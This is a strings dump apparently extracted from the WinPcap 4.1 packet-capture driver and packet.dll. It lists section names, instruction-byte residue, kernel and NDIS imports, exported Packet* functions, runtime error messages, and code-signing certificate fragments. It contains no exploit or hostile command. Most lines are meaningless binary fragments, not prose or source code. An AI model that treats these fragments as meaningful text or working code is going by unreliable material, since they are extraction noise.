? ?$?(?,?0?4?8?<?@?D?H?L?T?l?p?
0$0<0@0X0\0t0x0
1 1$1<1L1P1T1\1t1x1
2(2,2<2@2H2`2p2t2
3(3,3<3@3P3T3d3h3x3|3
4(4,4<4@4D4L4d4t4x4
5 5$5,5D5T5X5h5l5t5
9(9H9h9t9
: :(:X:`:d:|:
;$;@;L;h;
<$<(<D<H<h<
=(=H=h=
>(>D>H>h>
?$?0?8?P?X?`?h?|?
0$0,0@0H0L0T0\0d0x0
2 2@2H2T2t2
3,343<3D3P3
4(444\4t4
5 5@5H5P5\5|5
646@6`6h6p6|6
707<7\7d7l7t7|7
8D8\8p8|8
9(90989@9L9l9x9
:$:D:L:X:x:
;4;D;T;h;|;
<(<4<T<`<
=8=@=H=T=t=
?$?,?8?X?d?
0<0D0P0p0x0
1 1@1H1T1t1
2,242<2D2L2T2\2d2l2x2
3,383@3X3`3l3
4(4L4T4\4d4l4t4|4
5$5,545<5D5P5p5|5
686X6l6x6
7 707@7T7h7t7|7
888D8d8l8t8|8
809P9X9`9h9t9
: :,:L:T:`:
;$;(;,;4;H;d;h;
3 3$3(3,3034383<3@3D3H3X3x3|3
;H=X=h=x=
>$>,>4><>D>L>T>\>d>l>t>|>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?
0141`1d1h1l1p1t1x1|1
1X5\5x5
6 6$6(6,6064686<6@6D6H6L6P6T6X6x6
7$7@7\7x7
8,8L8h8
9,9D9X9p9
!This program cannot be run in DOS mode.
h.rdata
H.data
.pdata
B.reloc
UVWATAUH
CfD9+u
A]A\_^]
x ATAUAVH
H!t$`H!t$xH!
A^A]A\
SVWATAUAVAWH
F`A9Fd
`A_A^A]A\_^[
@SUVWATAUAVAWH
hA_A^A]A\_^][
UVWATAUAVAWH
@A_A^A]A\_^]
SUVWATAUAVAWH
t=L9#H
D$@L9`
`(L9'H
D$@L9`
XA_A^A]A\_^][
UVWATAUAVAWH
A_A^A]A\_^]
D$pH9X
UVWATAUAVAWH
D$8L9`
+D$4Hc
PA_A^A]A\_^]
*uTHcK
e:\releases\winpcap_4_1_0_2001\winpcap\packetntx\driver\bin\amd64\npf.pdb
ExAllocatePoolWithTag
IoDeleteSymbolicLink
ExFreePoolWithTag
KeResetEvent
RtlInitUnicodeString
IoDeleteDevice
RtlAppendUnicodeToString
RtlQueryRegistryValues
IoIs32bitProcess
KeReleaseSpinLock
IoFreeMdl
ZwQueryValueKey
ExInterlockedInsertTailList
ExEventObjectType
ZwClose
RtlAppendUnicodeStringToString
IofCompleteRequest
ObReferenceObjectByHandle
RtlWriteRegistryValue
MmProbeAndLockPages
PsGetVersion
ExInterlockedRemoveHeadList
RtlCompareMemory
MmUnlockPages
IoCreateSymbolicLink
ObfDereferenceObject
IoCreateDevice
ZwEnumerateKey
IoAllocateMdl
ZwOpenKey
KeAcquireSpinLockRaiseToDpc
KeSetEvent
ZwSetInformationThread
KeClearEvent
MmBuildMdlForNonPagedPool
KeReleaseSpinLockFromDpcLevel
MmMapLockedPagesSpecifyCache
KeWaitForSingleObject
KeAcquireSpinLockAtDpcLevel
KeBugCheckEx
ntoskrnl.exe
KeQueryPerformanceCounter
HAL.dll
NdisSystemProcessorCount
NdisResetEvent
NdisSetEvent
NdisWaitEvent
NdisRegisterProtocol
NdisDeregisterProtocol
NdisRequest
NdisFreePacketPool
NdisInitializeEvent
NdisAllocatePacketPool
NdisOpenAdapter
NdisCloseAdapter
NdisFreePacket
NdisAllocatePacket
NdisUnchainBufferAtFront
NDIS.SYS
__C_specific_handler
VeriSign, Inc.1+0)
"VeriSign Time Stamping Services CA0
070615000000Z
120614235959Z0\1
VeriSign, Inc.1402
+VeriSign Time Stamping Services Signer - G20
6^bMRQ4q
JcEG.k
http://ocsp.verisign.com0
"http://crl.verisign.com/tss-ca.crl0
TSA1-20
Western Cape1
Durbanville1
Thawte1
Thawte Certification1 0
Thawte Timestamping CA0
031204000000Z
131203235959Z0S1
VeriSign, Inc.1+0)
"VeriSign Time Stamping Services CA0
http://ocsp.verisign.com0
0http://crl.verisign.com/ThawteTimestampingCA.crl0
TSA2048-1-530
?7!Op1
VeriSign, Inc.1705
.Class 3 Public Primary Certification Authority0
040716000000Z
140715235959Z0
VeriSign, Inc.1 0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)041.0,
%VeriSign Class 3 Code Signing 2004 CA0
https://www.verisign.com/rpa01
http://crl.verisign.com/pca3.crl0
Class3CA2048-1-430
==d6|h
VeriSign, Inc.1705
.Class 3 Public Primary Certification Authority
VeriSign, Inc.1 0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)041.0,
%VeriSign Class 3 Code Signing 2004 CA0
080507000000Z
110507235959Z0
California1
Davis1 0
CACE Technologies, Inc.1>0<
5Digital ID Class 3 - Microsoft Software Validation v21 0
CACE Technologies, Inc.0
/http://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0?
3http://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0
==d6|h
Washington1
Redmond1
Microsoft Corporation1)0'
Microsoft Code Verification Root0
060523170129Z
160523171129Z0_1
VeriSign, Inc.1705
.Class 3 Public Primary Certification Authority0
Dhttp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
n.aAHu
g.Q{49
uN1+gc
VeriSign, Inc.1 0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)041.0,
%VeriSign Class 3 Code Signing 2004 CA
2o$qVX
VeriSign, Inc.1+0)
"VeriSign Time Stamping Services CA
100625170725Z0#
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
L$ SVH
L$ SVH
@SVWAUAWH
A_A]_^[
@VWATH
@SUVAUAVH
@A^A]^][
@A^A]^][
@A^A]^][
@A^A]^][
@A^A]^][
@A^A]^][
@SUVWAWH
A__^][
H9{Pt
D$@NPF
WATAUH
A]A\_
@SUATAWH
hA_A\][
+D$DHc
\$PH9\$H
H9\$H~
hA_A\][
VATAUH
A]A\^
WATAUH
@A]A\_
@UVWATAVAWH
|$`t>H
|$`t:H
D$Tfff
|$hD+|$PD+
A_A^A\_^]
@SVWAUAVH
HcD$@H
|$Xt6H
|$XtTH
A^A]_^[
WATAUH
0A]A\_
|$ ATAUAVH
A^A]A\
|$ ATH
|$ ATH
d$ AUAVAWH
A_A^A]
|$ ATAUAVH
A^A]A\
Hct$@H
shHcD$HH
WATAUAVAWH
D$8A9}
A_A^A]A\_
VWATAUAVH
0A^A]A\_^
@SUVWAUAVH
f;D$@upA
t2HcD$HH
t2HcD$HH
A^A]_^][
VWATAUAVH
0A^A]A\_^
|$ ATH
@SUVWH
@8l$&H
ATAUAVH
0A^A]A\
L$ VWATAUH
hA]A\_^
hA]A\_^
hA]A\_^
|$ ATH
ATAUAVH
PA^A]A\
@8t$Ht
PA^A]A\
l$ VWATH
D$8t#A
WATAUH
A]A\_
|$ ATH
ATAUAVH
A^A]A\
LcA<E3
WATAUAVAWH
@A_A^A]A\_
|$ ATH
d$ AUH
ATAUAVH
0A^A]A\
@UATAUAVAWH
e A_A^A]A\]
D$PH;5
L$ UATAUAVAWH
A_A^A]A\]
D$@H;5
D$Ht#A
u"8D$Xt
@SWATH
UVWAUAVH
PA^A]_^]
@USVWATAUAVAWH
eHA_A^A]A\_^[]
(null)
`h````
xpxxxx
`h`hhh
xppwpp
CorExitProcess
mscoree.dll
.mixcrt
EncodePointer
KERNEL32.DLL
DecodePointer
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
runtime error
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
InitializeCriticalSectionAndSpinCount
kernel32.dll
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
CONOUT$
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
\Device\NPF_
Export
GetAdaptersAddresses
AirpcapGetLastError
AirpcapGetDeviceList
AirpcapFreeDeviceList
AirpcapOpen
AirpcapClose
AirpcapGetLinkType
AirpcapSetKernelBuffer
AirpcapSetFilter
AirpcapGetMacAddress
AirpcapSetMinToCopy
AirpcapGetReadEvent
AirpcapRead
AirpcapGetStats
AirpcapWrite
WinPcap Packet Driver (NPF)
system32\drivers\NPF.sys
SYSTEM\CurrentControlSet\Services\%s
\\.\%s
\\.\Global\%s
e:\releases\winpcap_4_1_0_2001\winpcap\packetNtx\Dll\Project\Release No NetMon\x64\Packet.pdb
GetFileVersionInfoW
GetFileVersionInfoSizeW
VerQueryValueW
VERSION.dll
WS2_32.dll
GetAdaptersInfo
iphlpapi.dll
GlobalHandle
GlobalLock
WaitForSingleObject
GlobalUnlock
ReleaseMutex
GlobalFree
GlobalAlloc
CreateFileA
GetLastError
SetLastError
GetProcAddress
CreateMutexW
QueryPerformanceCounter
CreateEventW
SetEvent
DeviceIoControl
GetModuleHandleW
WriteFile
QueryPerformanceFrequency
WideCharToMultiByte
CloseHandle
LoadLibraryW
GetVersion
ReadFile
GetModuleFileNameW
GetFullPathNameW
MultiByteToWideChar
KERNEL32.dll
RegOpenKeyExW
RegEnumKeyW
RegCloseKey
RegQueryValueExA
RegQueryValueExW
CloseServiceHandle
OpenSCManagerW
ControlService
CreateServiceA
RegOpenKeyExA
StartServiceW
OpenServiceA
QueryServiceStatus
ADVAPI32.dll
GetCurrentThreadId
FlsSetValue
GetCommandLineA
HeapFree
GetVersionExA
HeapAlloc
GetProcessHeap
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
RtlCaptureContext
RtlVirtualUnwind
RtlLookupFunctionEntry
GetModuleHandleA
ExitProcess
FlsGetValue
TlsFree
FlsFree
TlsSetValue
FlsAlloc
HeapSetInformation
HeapCreate
HeapDestroy
SetHandleCount
GetStdHandle
GetFileType
GetStartupInfoA
DeleteCriticalSection
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
RtlUnwindEx
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
SetFilePointer
GetConsoleCP
GetConsoleMode
EnterCriticalSection
LeaveCriticalSection
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
LoadLibraryA
InitializeCriticalSection
HeapReAlloc
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
GetLocaleInfoA
HeapSize
FlushFileBuffers
packet.dll
PacketAllocatePacket
PacketCloseAdapter
PacketFreePacket
PacketGetAdapterNames
PacketGetAirPcapHandle
PacketGetDriverVersion
PacketGetNetInfoEx
PacketGetNetType
PacketGetReadEvent
PacketGetStats
PacketGetStatsEx
PacketGetVersion
PacketInitPacket
PacketIsDumpEnded
PacketLibraryVersion
PacketOpenAdapter
PacketReceivePacket
PacketRequest
PacketSendPacket
PacketSendPackets
PacketSetBpf
PacketSetBuff
PacketSetDumpLimits
PacketSetDumpName
PacketSetHwFilter
PacketSetLoopbackBehavior
PacketSetMinToCopy
PacketSetMode
PacketSetNumWrites
PacketSetReadTimeout
PacketSetSnapLen
PacketStopDriver
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
VeriSign, Inc.1+0)
"VeriSign Time Stamping Services CA0
070615000000Z
120614235959Z0\1
VeriSign, Inc.1402
+VeriSign Time Stamping Services Signer - G20
6^bMRQ4q
JcEG.k
http://ocsp.verisign.com0
"http://crl.verisign.com/tss-ca.crl0
TSA1-20
Western Cape1
Durbanville1
Thawte1
Thawte Certification1 0
Thawte Timestamping CA0
031204000000Z
131203235959Z0S1
VeriSign, Inc.1+0)
"VeriSign Time Stamping Services CA0
http://ocsp.verisign.com0
0http://crl.verisign.com/ThawteTimestampingCA.crl0
TSA2048-1-530
?7!Op1
VeriSign, Inc.1705
.Class 3 Public Primary Certification Authority0
040716000000Z
140715235959Z0
VeriSign, Inc.1 0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)041.0,
%VeriSign Class 3 Code Signing 2004 CA0
https://www.verisign.com/rpa01
http://crl.verisign.com/pca3.crl0
Class3CA2048-1-430
==d6|h
VeriSign, Inc.1705
.Class 3 Public Primary Certification Authority
VeriSign, Inc.1 0
VeriSign Trust Network1;09